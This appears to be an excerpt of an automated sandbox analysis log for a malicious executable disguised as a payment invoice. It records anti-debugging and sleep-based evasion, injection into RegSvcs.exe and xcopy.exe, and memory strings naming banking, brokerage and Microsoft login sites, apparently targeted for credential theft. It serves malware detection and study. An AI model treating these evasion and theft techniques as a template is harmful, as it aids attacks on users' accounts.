                Source: C:\Users\user\Desktop\Due Payment Invoice PISS2024993.exeMemory allocated: D300000 memory reserve | memory write watchJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_0102096E rdtsc 3_2_0102096E
                Source: C:\Users\user\Desktop\Due Payment Invoice PISS2024993.exeThread delayed: delay time: 922337203685477Jump to behavior
                Source: C:\Windows\SysWOW64\xcopy.exeWindow / User API: threadDelayed 9788Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeAPI coverage: 0.7 %
                Source: C:\Windows\SysWOW64\xcopy.exeAPI coverage: 2.6 %
                Source: C:\Users\user\Desktop\Due Payment Invoice PISS2024993.exe TID: 4444Thread sleep time: -922337203685477s >= -30000sJump to behavior
                Source: C:\Program Files (x86)\OJGHJXIyqEapPJjZGDfDlJeZArmxOoMlvpiiNmPZKvAMTUnY\cJjnESPXORw.exe TID: 5712Thread sleep time: -55000s >= -30000sJump to behavior
                Source: C:\Program Files (x86)\OJGHJXIyqEapPJjZGDfDlJeZArmxOoMlvpiiNmPZKvAMTUnY\cJjnESPXORw.exe TID: 5712Thread sleep time: -37500s >= -30000sJump to behavior
                Source: C:\Windows\SysWOW64\xcopy.exe TID: 5768Thread sleep count: 184 > 30Jump to behavior
                Source: C:\Windows\SysWOW64\xcopy.exe TID: 5768Thread sleep time: -368000s >= -30000sJump to behavior
                Source: C:\Windows\SysWOW64\xcopy.exe TID: 5768Thread sleep count: 9788 > 30Jump to behavior
                Source: C:\Windows\SysWOW64\xcopy.exe TID: 5768Thread sleep time: -19576000s >= -30000sJump to behavior
                Source: C:\Windows\SysWOW64\xcopy.exeLast function: Thread delayed
                Source: C:\Windows\SysWOW64\xcopy.exeLast function: Thread delayed
                Source: C:\Windows\SysWOW64\xcopy.exeCode function: 6_2_0281C420 FindFirstFileW,FindNextFileW,FindClose,6_2_0281C420
                Source: C:\Users\user\Desktop\Due Payment Invoice PISS2024993.exeThread delayed: delay time: 922337203685477Jump to behavior
                Source: xcopy.exe, 00000006.00000002.3915201437.0000000007B65000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: nteractive Brokers - EU East & CentralVMware20,11696428655
                Source: 56Q8T4H.6.drBinary or memory string: Canara Transaction PasswordVMware20,11696428655x
                Source: 56Q8T4H.6.drBinary or memory string: discord.comVMware20,11696428655f
                Source: 56Q8T4H.6.drBinary or memory string: interactivebrokers.co.inVMware20,11696428655d
                Source: 56Q8T4H.6.drBinary or memory string: Interactive Brokers - COM.HKVMware20,11696428655
                Source: 56Q8T4H.6.drBinary or memory string: global block list test formVMware20,11696428655
                Source: xcopy.exe, 00000006.00000002.3915201437.0000000007B65000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Eivebrokers.comVMware20,11696428655
                Source: 56Q8T4H.6.drBinary or memory string: Canara Transaction PasswordVMware20,11696428655}
                Source: 56Q8T4H.6.drBinary or memory string: Interactive Brokers - EU East & CentralVMware20,11696428655
                Source: 56Q8T4H.6.drBinary or memory string: Canara Change Transaction PasswordVMware20,11696428655^
                Source: 56Q8T4H.6.drBinary or memory string: account.microsoft.com/profileVMware20,11696428655u
                Source: xcopy.exe, 00000006.00000002.3915201437.0000000007B65000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: outlook.office365.comVMware20T>
                Source: xcopy.exe, 00000006.00000002.3915201437.0000000007B65000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: look.office.comVMware20,11696428655s
                Source: 56Q8T4H.6.drBinary or memory string: secure.bankofamerica.comVMware20,11696428655|UE
                Source: 56Q8T4H.6.drBinary or memory string: www.interactivebrokers.comVMware20,11696428655}
                Source: xcopy.exe, 00000006.00000002.3915201437.0000000007B65000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: ivebrokers.comVMware20,11696428655
                Source: 56Q8T4H.6.drBinary or memory string: Interactive Brokers - GDCDYNVMware20,11696428655p
                Source: 56Q8T4H.6.drBinary or memory string: Interactive Brokers - EU WestVMware20,11696428655n
                Source: 56Q8T4H.6.drBinary or memory string: outlook.office365.comVMware20,11696428655t
                Source: 56Q8T4H.6.drBinary or memory string: microsoft.visualstudio.comVMware20,11696428655x
                Source: cJjnESPXORw.exe, 00000005.00000002.3912099278.0000000000B17000.00000004.00000020.00020000.00000000.sdmp, xcopy.exe, 00000006.00000002.3911641445.00000000029C4000.00000004.00000020.00020000.00000000.sdmp, firefox.exe, 00000008.00000002.2707114710.000001A10989C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
                Source: 56Q8T4H.6.drBinary or memory string: Canara Change Transaction PasswordVMware20,11696428655
                Source: 56Q8T4H.6.drBinary or memory string: outlook.office.comVMware20,11696428655s
                Source: 56Q8T4H.6.drBinary or memory string: ms.portal.azure.comVMware20,11696428655
                Source: 56Q8T4H.6.drBinary or memory string: www.interactivebrokers.co.inVMware20,11696428655~
                Source: xcopy.exe, 00000006.00000002.3915201437.0000000007B65000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: soft.com/profileVMware20,11696428655u
                Source: 56Q8T4H.6.drBinary or memory string: AMC password management pageVMware20,11696428655
                Source: xcopy.exe, 00000006.00000002.3915201437.0000000007B65000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: ive Brokers - NDCDYNVMware20,11696428655z
                Source: 56Q8T4H.6.drBinary or memory string: tasks.office.comVMware20,11696428655o
                Source: 56Q8T4H.6.drBinary or memory string: Interactive Brokers - NDCDYNVMware20,11696428655z
                Source: 56Q8T4H.6.drBinary or memory string: turbotax.intuit.comVMware20,11696428655t
                Source: 56Q8T4H.6.drBinary or memory string: interactivebrokers.comVMware20,11696428655
                Source: 56Q8T4H.6.drBinary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696428655
                Source: 56Q8T4H.6.drBinary or memory string: dev.azure.comVMware20,11696428655j
                Source: 56Q8T4H.6.drBinary or memory string: netportal.hdfcbank.comVMware20,11696428655
                Source: xcopy.exe, 00000006.00000002.3915201437.0000000007B65000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: ivebrokers.co.inVMware20,11696428655~
                Source: xcopy.exe, 00000006.00000002.3915201437.0000000007B65000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Canara Change Transaction PasswordVMware20
                Source: 56Q8T4H.6.drBinary or memory string: Interactive Brokers - HKVMware20,11696428655]
                Source: 56Q8T4H.6.drBinary or memory string: bankofamerica.comVMware20,11696428655x
                Source: 56Q8T4H.6.drBinary or memory string: trackpan.utiitsl.comVMware20,11696428655h
                Source: xcopy.exe, 00000006.00000002.3915201437.0000000007B65000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: EU WestVMware20,11696428655n
                Source: 56Q8T4H.6.drBinary or memory string: Test URL for global passwords blocklistVMware20,11696428655
                Source: C:\Users\user\Desktop\Due Payment Invoice PISS2024993.exeProcess information queried: ProcessInformationJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess queried: DebugPortJump to behavior
                Source: C:\Windows\SysWOW64\xcopy.exeProcess queried: DebugPortJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_0102096E rdtsc 3_2_0102096E
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_004175C3 LdrLoadDll,3_2_004175C3
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_0108E10E mov eax, dword ptr fs:[00000030h]3_2_0108E10E
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_0108E10E mov ecx, dword ptr fs:[00000030h]3_2_0108E10E
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_0108E10E mov eax, dword ptr fs:[00000030h]3_2_0108E10E
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_0108E10E mov eax, dword ptr fs:[00000030h]3_2_0108E10E
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_0108E10E mov ecx, dword ptr fs:[00000030h]3_2_0108E10E
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_0108E10E mov eax, dword ptr fs:[00000030h]3_2_0108E10E
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_0108E10E mov eax, dword ptr fs:[00000030h]3_2_0108E10E
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_0108E10E mov ecx, dword ptr fs:[00000030h]3_2_0108E10E
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_0108E10E mov eax, dword ptr fs:[00000030h]3_2_0108E10E
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_0108E10E mov ecx, dword ptr fs:[00000030h]3_2_0108E10E
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_00FDC0F0 mov eax, dword ptr fs:[00000030h]3_2_00FDC0F0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_0108A118 mov ecx, dword ptr fs:[00000030h]3_2_0108A118
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_0108A118 mov eax, dword ptr fs:[00000030h]3_2_0108A118
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_0108A118 mov eax, dword ptr fs:[00000030h]3_2_0108A118
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_0108A118 mov eax, dword ptr fs:[00000030h]3_2_0108A118
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_00FE80E9 mov eax, dword ptr fs:[00000030h]3_2_00FE80E9
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_00FDA0E3 mov ecx, dword ptr fs:[00000030h]3_2_00FDA0E3
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_010A0115 mov eax, dword ptr fs:[00000030h]3_2_010A0115
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_01010124 mov eax, dword ptr fs:[00000030h]3_2_01010124
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_01074144 mov eax, dword ptr fs:[00000030h]3_2_01074144
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_01074144 mov eax, dword ptr fs:[00000030h]3_2_01074144
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_01074144 mov ecx, dword ptr fs:[00000030h]3_2_01074144
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_01074144 mov eax, dword ptr fs:[00000030h]3_2_01074144
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_01074144 mov eax, dword ptr fs:[00000030h]3_2_01074144
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_01078158 mov eax, dword ptr fs:[00000030h]3_2_01078158
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_00FE208A mov eax, dword ptr fs:[00000030h]3_2_00FE208A
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_0109C188 mov eax, dword ptr fs:[00000030h]3_2_0109C188
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_0109C188 mov eax, dword ptr fs:[00000030h]3_2_0109C188
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_01020185 mov eax, dword ptr fs:[00000030h]3_2_01020185
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_01084180 mov eax, dword ptr fs:[00000030h]3_2_01084180
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_01084180 mov eax, dword ptr fs:[00000030h]3_2_01084180
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_0106019F mov eax, dword ptr fs:[00000030h]3_2_0106019F
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_0106019F mov eax, dword ptr fs:[00000030h]3_2_0106019F
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_0106019F mov eax, dword ptr fs:[00000030h]3_2_0106019F
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_0106019F mov eax, dword ptr fs:[00000030h]3_2_0106019F
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_00FE2050 mov eax, dword ptr fs:[00000030h]3_2_00FE2050
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_010A61C3 mov eax, dword ptr fs:[00000030h]3_2_010A61C3
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_010A61C3 mov eax, dword ptr fs:[00000030h]3_2_010A61C3
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_0105E1D0 mov eax, dword ptr fs:[00000030h]3_2_0105E1D0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_0105E1D0 mov eax, dword ptr fs:[00000030h]3_2_0105E1D0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_0105E1D0 mov ecx, dword ptr fs:[00000030h]3_2_0105E1D0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_0105E1D0 mov eax, dword ptr fs:[00000030h]3_2_0105E1D0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_0105E1D0 mov eax, dword ptr fs:[00000030h]3_2_0105E1D0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_00FDA020 mov eax, dword ptr fs:[00000030h]3_2_00FDA020
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_00FDC020 mov eax, dword ptr fs:[00000030h]3_2_00FDC020
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_00FFE016 mov eax, dword ptr fs:[00000030h]3_2_00FFE016
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_00FFE016 mov eax, dword ptr fs:[00000030h]3_2_00FFE016
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_00FFE016 mov eax, dword ptr fs:[00000030h]3_2_00FFE016
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_00FFE016 mov eax, dword ptr fs:[00000030h]3_2_00FFE016
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_010B61E5 mov eax, dword ptr fs:[00000030h]3_2_010B61E5
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_010101F8 mov eax, dword ptr fs:[00000030h]3_2_010101F8
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_01064000 mov ecx, dword ptr fs:[00000030h]3_2_01064000
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_01082000 mov eax, dword ptr fs:[00000030h]3_2_01082000
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_01082000 mov eax, dword ptr fs:[00000030h]3_2_01082000
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_01082000 mov eax, dword ptr fs:[00000030h]3_2_01082000
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_01082000 mov eax, dword ptr fs:[00000030h]3_2_01082000
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_01082000 mov eax, dword ptr fs:[00000030h]3_2_01082000
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_01082000 mov eax, dword ptr fs:[00000030h]3_2_01082000
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_01082000 mov eax, dword ptr fs:[00000030h]3_2_01082000
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_01082000 mov eax, dword ptr fs:[00000030h]3_2_01082000
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_01076030 mov eax, dword ptr fs:[00000030h]3_2_01076030
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_01066050 mov eax, dword ptr fs:[00000030h]3_2_01066050
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_00FDA197 mov eax, dword ptr fs:[00000030h]3_2_00FDA197
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_00FDA197 mov eax, dword ptr fs:[00000030h]3_2_00FDA197
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_00FDA197 mov eax, dword ptr fs:[00000030h]3_2_00FDA197
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_0100C073 mov eax, dword ptr fs:[00000030h]3_2_0100C073
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_00FE6154 mov eax, dword ptr fs:[00000030h]3_2_00FE6154
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_00FE6154 mov eax, dword ptr fs:[00000030h]3_2_00FE6154
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_00FDC156 mov eax, dword ptr fs:[00000030h]3_2_00FDC156
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_010780A8 mov eax, dword ptr fs:[00000030h]3_2_010780A8
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_010A60B8 mov eax, dword ptr fs:[00000030h]3_2_010A60B8
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_010A60B8 mov ecx, dword ptr fs:[00000030h]3_2_010A60B8
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_010620DE mov eax, dword ptr fs:[00000030h]3_2_010620DE
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_010660E0 mov eax, dword ptr fs:[00000030h]3_2_010660E0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_010220F0 mov ecx, dword ptr fs:[00000030h]3_2_010220F0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_0101A30B mov eax, dword ptr fs:[00000030h]3_2_0101A30B
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_0101A30B mov eax, dword ptr fs:[00000030h]3_2_0101A30B
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_0101A30B mov eax, dword ptr fs:[00000030h]3_2_0101A30B
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_01000310 mov ecx, dword ptr fs:[00000030h]3_2_01000310
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_00FF02E1 mov eax, dword ptr fs:[00000030h]3_2_00FF02E1
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_00FF02E1 mov eax, dword ptr fs:[00000030h]3_2_00FF02E1
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_00FF02E1 mov eax, dword ptr fs:[00000030h]3_2_00FF02E1
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_00FEA2C3 mov eax, dword ptr fs:[00000030h]3_2_00FEA2C3
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_00FEA2C3 mov eax, dword ptr fs:[00000030h]3_2_00FEA2C3
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_00FEA2C3 mov eax, dword ptr fs:[00000030h]3_2_00FEA2C3
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_00FEA2C3 mov eax, dword ptr fs:[00000030h]3_2_00FEA2C3
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_00FEA2C3 mov eax, dword ptr fs:[00000030h]3_2_00FEA2C3
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_01062349 mov eax, dword ptr fs:[00000030h]3_2_01062349
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_01062349 mov eax, dword ptr fs:[00000030h]3_2_01062349
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_01062349 mov eax, dword ptr fs:[00000030h]3_2_01062349
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_01062349 mov eax, dword ptr fs:[00000030h]3_2_01062349
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_01062349 mov eax, dword ptr fs:[00000030h]3_2_01062349
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_01062349 mov eax, dword ptr fs:[00000030h]3_2_01062349
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_01062349 mov eax, dword ptr fs:[00000030h]3_2_01062349
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_01062349 mov eax, dword ptr fs:[00000030h]3_2_01062349
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_01062349 mov eax, dword ptr fs:[00000030h]3_2_01062349
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_01062349 mov eax, dword ptr fs:[00000030h]3_2_01062349
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_01062349 mov eax, dword ptr fs:[00000030h]3_2_01062349
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_01062349 mov eax, dword ptr fs:[00000030h]3_2_01062349
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_01062349 mov eax, dword ptr fs:[00000030h]3_2_01062349
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_01062349 mov eax, dword ptr fs:[00000030h]3_2_01062349
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_01062349 mov eax, dword ptr fs:[00000030h]3_2_01062349
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_010AA352 mov eax, dword ptr fs:[00000030h]3_2_010AA352
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_01088350 mov ecx, dword ptr fs:[00000030h]3_2_01088350
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_0106035C mov eax, dword ptr fs:[00000030h]3_2_0106035C
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_0106035C mov eax, dword ptr fs:[00000030h]3_2_0106035C
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_0106035C mov eax, dword ptr fs:[00000030h]3_2_0106035C
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_0106035C mov ecx, dword ptr fs:[00000030h]3_2_0106035C
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_0106035C mov eax, dword ptr fs:[00000030h]3_2_0106035C
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_0106035C mov eax, dword ptr fs:[00000030h]3_2_0106035C
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_00FF02A0 mov eax, dword ptr fs:[00000030h]3_2_00FF02A0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_00FF02A0 mov eax, dword ptr fs:[00000030h]3_2_00FF02A0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_0108437C mov eax, dword ptr fs:[00000030h]3_2_0108437C
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_0100438F mov eax, dword ptr fs:[00000030h]3_2_0100438F
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_0100438F mov eax, dword ptr fs:[00000030h]3_2_0100438F
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_00FD826B mov eax, dword ptr fs:[00000030h]3_2_00FD826B
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_00FE4260 mov eax, dword ptr fs:[00000030h]3_2_00FE4260
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_00FE4260 mov eax, dword ptr fs:[00000030h]3_2_00FE4260
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_00FE4260 mov eax, dword ptr fs:[00000030h]3_2_00FE4260
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_00FE6259 mov eax, dword ptr fs:[00000030h]3_2_00FE6259
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_00FDA250 mov eax, dword ptr fs:[00000030h]3_2_00FDA250
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_0109C3CD mov eax, dword ptr fs:[00000030h]3_2_0109C3CD
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_00FD823B mov eax, dword ptr fs:[00000030h]3_2_00FD823B
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_010663C0 mov eax, dword ptr fs:[00000030h]3_2_010663C0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_0108E3DB mov eax, dword ptr fs:[00000030h]3_2_0108E3DB
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_0108E3DB mov eax, dword ptr fs:[00000030h]3_2_0108E3DB
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_0108E3DB mov ecx, dword ptr fs:[00000030h]3_2_0108E3DB
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_0108E3DB mov eax, dword ptr fs:[00000030h]3_2_0108E3DB
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_010843D4 mov eax, dword ptr fs:[00000030h]3_2_010843D4
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_010843D4 mov eax, dword ptr fs:[00000030h]3_2_010843D4
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_010163FF mov eax, dword ptr fs:[00000030h]3_2_010163FF
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_00FFE3F0 mov eax, dword ptr fs:[00000030h]3_2_00FFE3F0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_00FFE3F0 mov eax, dword ptr fs:[00000030h]3_2_00FFE3F0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_00FFE3F0 mov eax, dword ptr fs:[00000030h]3_2_00FFE3F0
